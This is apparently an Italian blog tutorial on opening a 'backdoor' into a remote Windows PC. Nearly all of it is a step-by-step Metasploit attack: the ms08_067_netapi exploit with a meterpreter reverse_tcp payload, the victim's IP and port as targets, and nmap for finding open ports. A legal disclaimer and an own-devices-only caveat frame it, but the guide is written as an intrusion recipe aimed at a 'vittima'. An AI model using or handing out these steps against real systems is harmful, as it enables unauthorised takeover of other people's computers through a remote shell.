Abbiamo discusso già alcune volte sui vari modi esistenti per riuscire ad entrare in dispositivi remoti. In alcuni articoli precedenti, infatti, vi ho parlato dell’esistenza di alcuni metodi per accedere a computer da remoto semplicemente utilizzando una backdoor; ma di metodo non ne esiste solo uno, anzi, ci sono numerosissimi modi per riuscire a crearsi “una porta” di accesso all’interno di un dispositivo di cui non avete alcun controllo fisico. Questa”porta di accesso” o, meglio chiamata, backdoor, è uno dei principali mezzi utilizzati dagli hacker per riuscire a prendere possesso di una macchina remota; il principio di funzionamento è abbastanza intuitivo: l’attaccante innanzitutto deve sapere l’indirizzo IP del dispositivo di cui vuole impadronirsi, individua le principali vulnerabilità del sistema remoto, da un’occhiata alle porte aperte del PC, e con qualche comando riesce ad aprirsi quello spazio che permette la comunicazione tra il computer dell’hacker e quello della vittima; possiamo dire che nonostante tutti siano dotati degli ultimissimi software all’avanguardia per proteggersi da questo genere di attacchi, nessuno può sentirsi realmente al sicuro; quasi tutti i sistemi informatici sono affetti da falle di sicurezza che compromettono quotidianamente la nostra sicurezza in ambiente virtuale. Ma adesso torniamo a noi; se sei interessato su come creare una backdoor per accedere ad un PC remoto non devi far altro che seguire questa guida; testate questo procedimento soltanto sui vostri dispositivi, in quanto manomettere la privacy altrui è un reato. Cominciamo! Per svolgere queste operazioni utilizzeremo Kali Linux, uno dei più completi e funzionali dei sistemi operativi specializzati nel penetration test.

Seguono in ordine tutte le azioni che andremo a svolgere passo dopo passo:

-Apriamo un terminale e digitiamo “msfconsole”

Creare una backdoor per accedere ad un altro PC

 

 

 

 

 

 

-use windows/smb/ms08_067_netapi

Creare una backdoor per accedere ad un altro PC

 

 

 

 

 

 

-set payload windows/meterpreter/reverse_tcp

Creare una backdoor per accedere ad un altro PC

 

 

 

 

 

 

-set lhost (indirizzo IP locale)

N.B: come porta vi consiglio la 443

Creare una backdoor per accedere ad un altro PC

 

 

 

 

 

 

-set lport

Creare una backdoor per accedere ad un altro PC

 

 

 

 

 

 

-set rhost (indirizzo IP  vittima)

Creare una backdoor per accedere ad un altro PC

 

 

 

 

 

 

-set rport (porta vittima)

N.B: per individuare le porte aperte potete eseguire su un altro terminale il comando “nmap “indirizzo IP vittima”

Creare una backdoor per accedere ad un altro PC

 

 

 

 

 

 

-exploit

Dopo questo passaggio avrete completato l’exploit e potete conoscere tutte le azioni possibili digitando il comando “help”

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera o sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella, dati, informazioni o programmi informatici (art. 635 bis c.p.).